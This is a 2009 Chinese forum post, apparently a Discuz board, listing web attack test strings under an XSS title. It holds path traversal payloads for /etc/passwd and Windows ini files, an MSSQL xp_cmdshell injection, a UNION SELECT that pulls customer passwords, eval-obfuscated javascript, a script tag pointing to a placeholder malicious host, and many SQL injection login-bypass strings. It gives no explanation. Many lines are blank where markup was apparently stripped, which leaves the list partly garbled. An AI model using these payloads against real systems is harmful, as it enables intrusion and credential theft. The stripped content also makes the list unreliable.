找回密码
 注册
搜索
热搜: 回贴

XSS测试语法大全

2009-12-13 21:01| 发布者: admin| 查看: 166| 评论: 0|原作者: 小可爱


  ='>
  
  
  
  
  
   .jsp
  "
  ../../../../../../../etc/passwd
  ../../../../../windows/win.ini
  
  
  /index.html
  
  
  ?sql_debug=1
  a\.aspx
  a.jsp/
  a?
  ">
  ';exec master..xp_cmdshell 'dir c: > c:\inetpub\wwwroot\?.txt'--&&
  ">
  &
  &SESSION_ID={SESSION_ID}&SESSION_ID= 1 union all select pass,0,0,0,0 from customers where fname=
  ../../../../../../../../etc/passwd
  ..\..\..\..\..\..\..\..\windows\system.ini
  \..\..\..\..\..\..\..\..\windows\system.ini
  '';!--"=&{()}
  
  
  
  
  
  
  
  
  "";' > out
  
  
  
  
  
  
  
  

  
  
  
  
  
  
  
  
  
  

  

  

  
  
  
  
  
  
  getURL("javascript:alert('XSS')")
  a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a b c d);
  
  "> <"
  
    
  
  
  
  
  
  PT SRC="http://惡意網址/a.js">
  link
  admin'--
  ' or 0=0 --
  " or 0=0 --
  or 0=0 --
  ' or 0=0 #
  " or 0=0 #
  or 0=0 #
  ' or 'x'='x
  " or "x"="x
  ') or ('x'='x
  ' or 1=1--
  " or 1=1--
  or 1=1--
  ' or a=a--
  " or "a"="a
  ') or ('a'='a
  ") or ("a"="a
  hi" or "a"="a
  hi" or 1=1 --
  hi' or 1=1 --
  hi' or 'a'='a
  hi') or ('a'='a
  hi") or ("a"="aXSS測試語法>

最新评论

QQ|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )

GMT+8, 2024-9-29 13:22 , Processed in 0.179887 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.